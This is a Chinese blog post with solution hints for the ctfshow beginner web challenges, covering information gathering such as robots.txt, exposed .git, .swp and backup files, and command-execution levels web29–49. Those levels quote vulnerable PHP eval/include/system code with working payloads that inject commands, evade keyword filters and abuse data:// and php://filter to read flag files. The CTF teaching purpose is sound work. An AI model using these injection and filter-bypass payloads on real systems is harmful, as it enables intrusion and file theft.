ctfshow中web入门题关键解题思路

最新推荐文章于 2024-05-16 10:31:08 发布
最新推荐文章于 2024-05-16 10:31:08 发布
阅读量375 收藏 2
点赞数
文章标签: 前端 php web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cutesharkl/article/details/131631593
版权

一、信息搜集 

1.web1

查看页面源代码

2.web2

burdsuite抓包

3.web3

burdsuite抓包

4.web4

查看robots.txt文件

5.web5

查看index.phps文件

6.web6

一般网站开发的源代码的压缩包都是www.zip

7.web7

常用的版本控制工具为.git和.svn

8.web8

常用的版本控制工具为.git和.svn

9.web9

非正常关闭vim编辑器时(直接关闭电脑终端或者关闭电源),会生成一个.swp文件(这个文件是一个临时交换文件),用来备份缓冲区中的内容

10.web10

burdsuite抓包后无需做任何修改直接重放,查看http响应报文中的cookie字段即可拿到flag!

11.web11

题目已经将flag告诉我们!

12.web12

仔细观察网页,获得管理员登录密码后直接拿到flag!

15.web15

先观察网页,发现网页底部有一个QQ邮箱,然后访问网页登录页面,选择忘记密码,查询QQ邮箱所在地即可拿到密保答案

17.web17

访问backup.sql文件

二、命令执行

web29

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

1.	?c=system("cat fl``ag.php");
2.	?c=system("cat fla*.php");
3.	?c=echo `nl fl''ag.php`;

cat 可替换为 tac | more | less | curl | nl | tail | sort | strings

payload

 ?c=system("cat fl``ag.php");

web30

payload:

 ?c=echo`nl fl*`;

web31

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

payload:

1. ?c=eval($_GET[1]);&1=system("cat flag.php");
2. ?c=echo`nl%09fl*`;

此题通过get先传一个参数1,在后面执行cat flag.php的命令是不会被过滤的

web32-36

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤空格 和 ;
用?>代替 ;

payload:

1. ?c=include$_GET[0]?>&0=data://text/plain,<?php echo(`cat flag.php`);?>
2. ?c=include$_GET[0]?>&0=php://filter/read=convert.base64-encode/resource=flag.php

web37-38

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

payload:

1.?c=data:text//plain,<?=system("nl fl*");?>
2.?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

web39

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

?c=php://filter/read=convert.base64-encode/resource=fl*(姿势不对)

还是用data
?>.php不影响前面已经闭合的php语句

payload:

?c=data://text/plain,<?php system("cat f*");?>

web40

<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

过滤的是中文括号,用到以下包含英文括号的函数:

localeconv():返回一包含本地数字及货币格式信息的数组。其中数组中的第一个为点号(.)

pos():返回数组中当前元素的值

scandir():获取目录下的文件

array_reverse():将数组逆序排列

next():函数将内部指针指向下一元素,并输出

payload:
先查看目录下的文件名:

 ?c=print_r(scandir(pos(localeconv())));


接着用array_reverse()和next(),使指针指向flag.php,并用highlight_file()输出,得到flag。

?c=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

highlight_file或show_source

web42

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

此题代码的system()中有" >/dev/null 2>&1",他的作用是将程序的标准输出和错误输出都存到/dev/null(舍弃掉)。

payload:

?c=ls;

?c=cat flag.php;
cat flag.php%0a
cat flag.php||
cat flag.php%26
cat flag.php%26%26

web43-44-45-46

过滤了cat用tac,过滤了;用%0a或 ||。

过滤了flag

?c=tac fl*%0a
?c=tac fl??????%0a(?与省略的ag.php数量一致)
?c=tac fl``ag.php||

过滤空格

?c=tac%09fla*%0a

?c=tac$IFS$9fl'ag'.php||

?c=tac<fl'ag'.php||

?c=tac${IFS}fl'ag'.php||

?c=tac<>fl'ag'.php||

过滤数字

%0a是换行符,能代替分号

虽然这题过滤了数字,但因为%09是一个字符,属于编码,在带入服务器时会进行解码,所以并没有被过滤

web47-49

payload:

?c=tac%09fl'ag'.php%0a

 

cutesharkl
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctfshow-VIP目-Web-详细解题思路
01-27
CTFSHOW-VIP目-Web-详细解题思路 本文档总结了CTFSHOW-VIP目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFSHOW web193 left标注盲注脚本
05-04
,它通过修改注入语句的 payload 变量,来获取不同的信息,包括数据库名、表名、列名和 flag 的值。在获取每个字符时,它会枚举 flag 可能的字符,逐个尝试,直到找到正确的字符为止。最终,它会输出获取到的...
CTF ---web思路总结
A13837377363的博客
03-08 1721
面对一道web时,先注意目名字或者提示。如'eazy_sql'则大概率为sql注入目。若含有'flask''tornado'等词,可以考虑去搜索这些服务器的历史漏洞。
基于CTFshowweb4下的文件包含学习
Cyber Striver的博客
09-26 1379
基于CTFshowweb4下的文件包含学习。还涉及ctfhub的文件包含解。
ctfshow-WEB-web12( 利用代码执行漏洞读取敏感文件)_ctfshow web12
最新发布
2401_84297618的博客
05-16 253
需要完整版PDF学习资源进入页面后, 只有一句话 where is the flag?按照以往的经验, 线索肯定就藏在前端页面的源代码右键检查或者按F12, 进入开发者模式, 或者直接右键查看网页源代码, 源码的注释提示了 cmd, 是在暗示我们利用代码执行漏洞传入cmd参数, 验证一下代码执行漏洞成功显示出php信息, 说明存在代码执行漏洞接下来遍历目录glob()函数可以查找文件, 返回一个文件数组, 常配合通配符来遍历目录可以看到目录下有两个文件, 盲猜这个名字特殊的文件里面就有flag。
最全CTF Web思路总结(更新ing)
热门推荐
yjprolus的博客
02-12 4万+
个人向CTF Web思路总结笔记
ctfshow-web9(奇妙的ffifdyop绕过)
Welcome To Myon'Blog !
10-09 627
这里执行了 SQL 查询并将结果存储在 $result 变量,然后通过 mysqli_num_rows($result) 检查返回的结果集是否有行数大于0的数据,如果有,表示登录成功,就会输出flag。这段代码构建了一个 SQL 查询,但是它没有对用户输入进行适当的过滤或净化,很可能存在SQL注入,并且密码在数据库储存为 MD5 散列值。首先验证用户提交的密码是否超过10个字符,如果超过,就终止脚本并显示密码错误消息。or后面的第一个字母只要不是0,都会被认为是true,从而实现sql注入的绕过。
CTFWeb目的各种基础的思路-----入门篇十分的详细
m0_64815693的博客
09-13 2万+
想学习CTF-web这里给你一个思路,给你一个方向
ctfshow-web12
HAI_WD的博客
08-23 231
关于disable_functions的绕过,里面的内容就比较多了,有兴趣的师傅可以自行研究,先说这道的做法。读取一下这个文件,这里使用highlight_file进行读取,这个内置函数的意思是将内容高亮读出来。然后尝试执行命令,无法,发现存在disable_functions,很多命令都无法执行。当然也可以通过其他方式获取内容,主打一个不懂就问。然后做一下测试,看是命令执行还是代码执行。国际惯例看一下返回包,是不是有注释。然后可以看到当前目录下有两个文件。通过蚁剑的绕过脚本可以直接处理。
ctfshow-萌新web12
m0_73303597的博客
11-18 403
自用
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFshow-web-web12
qq_68581192的博客
10-20 79
highlight_file()函数可以用于将一个PHP文件的代码高亮显示,并输出到页面上或者保存到文件。利用burpsuite进行抓包,发现是get传参。glob()函数返回匹配指定模式的文件名或目录。glob(“.txt”)匹配以txt后缀的文件。我们使用高亮函数,将长的文件显示一下。我们将当前目录下的文件打印出,输入。php有个函数glob();glob(“”)匹配任意文件。尝试远程代码执行,传入参数。查看源代码,发现有个提示。
ctfshow-Web入门-sherlock
m0_58327783的博客
04-13 492
信息泄露可以参考https://blog.csdn.net/a597934448/article/details/105431367。
之旅第33站,CTFshow web12
cc菜的一批
02-17 638
感谢ctf show平台提供目 F12查看一下源代码,得到了提示。 既然提示了cmd=,那么可能后端代码存在 eval() 或者exec()等可以执行命令的代码。 尝试提交,我们看到了php的配置信息。 ?cmd=phpinfo(); 使用glob通配符命令,提交命令,得到了一个php文件名。 ?cmd=print_r(glob("*.*")); 使用文件高亮命令,读出这个文件的PH...
CTFshow 信息收集 web12 13 14 15
ChenD的学习笔记
11-07 579
CTFshow web入门 信息收集 web12 web13 web14 web15
CTFSHOW web入门——web9
m0_74093152的博客
02-05 231
CTFSHOWweb入门——web9
ctfshow--web入门web1-web20)
qing_chuan_的博客
05-20 282
mdb文件是早期asp+access构架的数据库文件 直接查看url路径添加/db/db.mdb 下载文件通过txt打开或者通过EasyAccess.exe打开搜索flag flag{ctfshow_old_database}考察vim缓存信息泄露,直接访问url/index.php.swp 注:上面的信息泄露可以参考。在进入/admin/,要登录密码,提示说密码在页面最下方,最下方有个电话号码372619038。考察git代码泄露,直接访问url/.git/index.php。查看源代码,发现flag。
ctfshow-web入门爆破
08-30
ctfshow-web入门爆破,可以使用正则爆破脚本来实现对目录的暴力破解。该脚本会将true拼接成数字,并以此来替换ASCII码的数字、字母和特殊符号,以实现对目录的爆破。通过暴力破解目录/0-100/0-100/看返回数据包,可以在爆破过程去掉2.txt,只爆破目录即可。可以通过查看返回的数据包来获取目录的信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow web185 正则爆破脚本](https://download.csdn.net/download/eason612/86793758)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CTFshow web入门——爆破](https://blog.csdn.net/qq_49480008/article/details/112991503)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值